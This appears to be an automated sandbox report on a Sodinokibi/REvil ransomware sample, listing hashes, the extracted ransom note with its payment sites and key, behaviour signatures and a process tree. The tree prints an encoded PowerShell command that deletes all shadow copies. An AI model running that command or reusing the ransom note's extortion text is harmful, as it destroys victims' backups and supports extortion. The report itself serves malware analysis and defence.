Analysis

  • max time kernel
    154s
  • max time network
    165s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:49

General

  • Target

    e3d63d0a1779743676800d203980edbcb2cabbf159df5555de965f425efd0895.exe

  • Size

    801KB

  • MD5

    3bbb20d2a54e6bc9daa290008899c9e3

  • SHA1

    25a76b9835a7b3bf10666230122b9efea79c840d

  • SHA256

    e3d63d0a1779743676800d203980edbcb2cabbf159df5555de965f425efd0895

  • SHA512

    4a6d3df419a4e33848ec21840c1ed3797801ef5797e73ed369daeab9a7a95675b202f99cb18a8606d4209eb21d43441150101a47279862662cfd8658767f0be8

Malware Config

Extracted

Path

C:\93n14-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 93n14. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7125E1BB6491D41F 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/7125E1BB6491D41F Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ocA5VeQgMKM8cEMV8EX3Gh0OcvszO2Jo0IK9Nx4W3y+1GJlQmCKezWGoQ/7fUFHQ N7VLaFQfH8mNBcQxpQU0YG0BD1pMNAeNPH81s+tzR2IBzGHYoC3cB/CyrlaJ6YRU MhJUkBH7jezibV/ExyDSiSygs+lfdgx7YOyO/lON8JzA/3ZlcgGKC2GdfSChzA7f eMnQ/Bgw29L1AG17FjeYSwpu+0RuumGHarmjc3KBob3+rk58TB/0M3l8OK02Kn5Y IbQNLP+Cx4jFN7jNXhxHAKkOm0EWnNjBoaGyAzQMmVEJQxkrOIi2YZCJf3QG7tRW 9nCUU6MnczUUuaA7dEFVEFK5Tbqf42Kbg/8Ylk6qgPmQimbKq+NVUZRQBS0esN2K mwluyNLKNjBsUDIkiLTgL0lJIjVPzeWz3ASXyeE1Ly3c2CKRy0lJg4ElSJ9xLssB b9qyq6IPKk/t0oSlhQWOQTX6i7I3sjR6LzyqCiEATl19nR+2wkQdlTJki7vfoPLs vm2c5cROvfSIQf4Bdq3mZqKLem859MhfFsph5CSW6F1dRmn8MXN/GIWMTXTDeVXb zHbK8u0/P7Dt2/yn//LemhmhwJanwdKpDoS4Nimr6ZKID/GvKGhqtFa9e9+/b/Tj a8w8w0ANWq2jeycMVL/S7FMv7gzC0pn1M6PqzyxeIyC1cH/m4pXugMTaHkVg+RK3 BRQZItlhnPu3ac+HY9TJcvIRUrESDayEVrI96Pph7HGaLQwAUIQwNSPrub5r0aNj 8rA0hlkdNqQvGyZMsD3zc9onwxxVTn3nFjxbdc+DEUyfqSpenXzBTX562Hx+s2OF Irb2AThmnOsaNwZ2drPLVSI7VAuKj19ee6YfbqbsBAaHKkLE5M+jREy6JuF0s7Jv wYXElP+pMIAYi3R7/BWqjU999gldnKc+YNoelN6NQkNWn3EHtd77exlLs+evH0/t VAPK/OQrFsxlp50ESlnxskoBeNhAXSHNOkYuwDKN2SNfkyJIJ2AcP6Uma3bnGPrY IXPLvqcyWX/NMwzAUIHICx1u0Nca5YQf1BpkUP7jXraNC0fRPnwPJ2n8R8fmy9Gb QlVO2m6hnDhut1W47wilGfVvm3i7QSC6sUajnqOZCoCTTAWghwDAl9oeu28Io2Ag rKngDCKqTwpGW/1WyrvF41cU3XMlDujlCUIIbRdVIAehSdfRR7b8PkEr2NagLhGI O7o2JMnU4H6AqmEiszaO5PdfYKKnLoZYPXAPONn/Q8rwpjNsbbNx60BzkQHfERxN u7XAMJvyMvb3+OU7GEo= Extension name: 93n14 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7125E1BB6491D41F

http://decryptor.cc/7125E1BB6491D41F

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 37 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e3d63d0a1779743676800d203980edbcb2cabbf159df5555de965f425efd0895.exe
    "C:\Users\Admin\AppData\Local\Temp\e3d63d0a1779743676800d203980edbcb2cabbf159df5555de965f425efd0895.exe"
    1⤵
    • Modifies extensions of user files
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2584
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2588
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:408

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2572-123-0x00000229A62B0000-0x00000229A62D2000-memory.dmp
      Filesize

      136KB

    • memory/2572-128-0x00000229A6460000-0x00000229A64D6000-memory.dmp
      Filesize

      472KB

    • memory/2572-133-0x000002298A2C0000-0x000002298A302000-memory.dmp
      Filesize

      264KB

    • memory/2572-135-0x000002298A2C0000-0x000002298A302000-memory.dmp
      Filesize

      264KB